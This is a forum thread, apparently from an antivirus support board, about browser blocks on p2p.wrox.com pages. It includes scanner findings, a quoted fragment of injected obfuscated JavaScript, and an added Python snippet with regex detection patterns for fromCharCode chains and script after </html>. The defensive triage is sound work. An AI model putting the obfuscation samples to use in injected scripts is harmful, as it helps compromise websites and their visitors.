p2p.wrox.com blocked as malicious

Dear Avast Staff,

I’m a happy customer of your Antivirus. Thanks for this.

I’m writing here because when I try to visit this URL “p2p.wrox.com/content/tags/mac”, Avast blocks it since it contains malicious content. In particular, the message I receive is the following.

JS:Agent-ATR [Trj]

The same applies to “p2p.wrox.com/content/blogs/jminatel/new-drm-free-ebook-bundle-4-iphone-books-one-value-price”.

Since the site belongs to the Wrox site, could you elaborate on this? Is this a FP?

Here is the Virus Total scan report: 0 / 35
https://www.virustotal.com/url/aedb07014d247498d391df051e3fceb973169cea8edad446909c1c9dc590eb7f/analysis/

If the site contains malicious content, can I be sure that Avast has stopped the infection? Do I have to run a scan to be sure?

Thank you in advance.

Best regards.

IMPORTANT: To prevent accidental clicks on the previous links, I removed the http:// prefix.

P.S. I’m executing MBAM with Realtime protection. It doesn’t block those links as malicious.

Issue here: http://page2rss.com/2c35e5a4abff4ae67210ce5e1ae41f07
flagged is !{gzip} malcode. Content after the </html> tag should be considered suspicious.
Outdated software needs updating: Application: vBulletin 3.6.8 - htxp://www.vbulletin.com/

Malware found in the URL:
htxp://p2p.wrox.com/archives/index.php
Known javascript malware.
See Details: http://sucuri.net/malware/malware-entry-mwanomalysp7
Malware Script Detector flags:

Warning:

This site URL may contain possible malicious scripts hosted or injected!

Solutions: Close this window, Disable JavaScript

Detected Malware: XSS URL Injection Malware

Source:htxp://www.google.com/search?client=broser&channel={browser:context}&q=%3C%21–+%2F+SmartSource+7±-%3E%3Cscript%3Eif+%28i5463+%3D%3D+null%29+%7B+var+i5463+%3D+1%3B+var+vst+%3D+String.fromCharCode%2868%29%2BString.fromCharCode%28111%29%2BString.fromCh&ie=utf-8&oe=utf-8&aq=t etc. etc .

So no false positive, real javascript malware…

polonus
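
The two signals named in the scan notes above, content after the closing </html> tag and a chain of String.fromCharCode calls like the one in the flagged source, shown as an added example that is not part of the original thread or any scanner's own code. The function names and both sample pages are constructed for illustration, and a hit is a triage signal for further review, not a verdict.

```python
import re

# Heuristics taken from the scan notes in the post above (added example).
CLOSE_HTML = re.compile(r"</\s*html\s*>", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
# Three or more String.fromCharCode(n) calls joined with '+'.
CHARCODE_CHAIN = re.compile(
    r"(?:String\.fromCharCode\(\s*\d+\s*\)\s*\+\s*){2,}"
    r"String\.fromCharCode\(\s*\d+\s*\)"
)


def trailing_content(html):
    """Return whatever follows the last </html> tag, whitespace stripped."""
    matches = list(CLOSE_HTML.finditer(html))
    if not matches:
        return ""
    return html[matches[-1].end():].strip()


def triage(html):
    """Return a list of finding names for one fetched page body."""
    findings = []
    tail = trailing_content(html)
    if tail:
        findings.append("content-after-html-close")
        if SCRIPT_TAG.search(tail):
            findings.append("script-after-html-close")
    if CHARCODE_CHAIN.search(html):
        findings.append("fromCharCode-chain")
    return findings


# Constructed sample pages (not fetched from the site in the thread).
CLEAN_PAGE = "<html><body><p>Forum index</p></body></html>\n"
INJECTED_PAGE = (
    "<html><body><p>Forum index</p></body></html>\n"
    "<!-- marker --><script>if (flag == null) { var flag = 1; var s = "
    "String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(99);"
    " }</script>"
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, triage(page))
```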

Dear polonus,

Thanks for the reply.

Why does Virus Total give a result of 0/35?

What about the first link? I cannot understand what you mean.

Finally, and most important, do I have to run a scan to be sure I’m clean?

Thank you for your attention.

Hi rebel84,

Cnotes are notes on website software vulnerabilities, specifically for Joomla etc.
In this case probably an input validation error was being abused by the attacker(s),
read: http://www.securityfocus.com/bid/29293
An exploit for which there was no vendor-applied patch (credit for this goes to Ali Jasbi mentioned on securityfocus)
That is why I gave the first link, so the security aware would know where to look and see the pending threat of the vBulletin weakness.
I give it here in my reply as you specifically asked about the issue…

About the scan, I would not worry one bit, blocked by avast shield these binaries have not even reached your machine, so you are being protected and fully secure thanks to the avast shields. “Chapeau” again to the added protection from avast shields…

polonus

Thank you very much for your reply.

Why does Virus Total give a result of 0/35?
VirusTotal URL scan is a reputation scan..... it does not scan for malware

unless you download it and scan :wink:
https://www.virustotal.com/file/2eecdd6df714a6d488921a9c9effdf84626cdb35ef63a9ea4997b4a88b358962/analysis/1358983816/

Sucuri
http://sitecheck.sucuri.net/results/p2p.wrox.com

Thank you for your reply.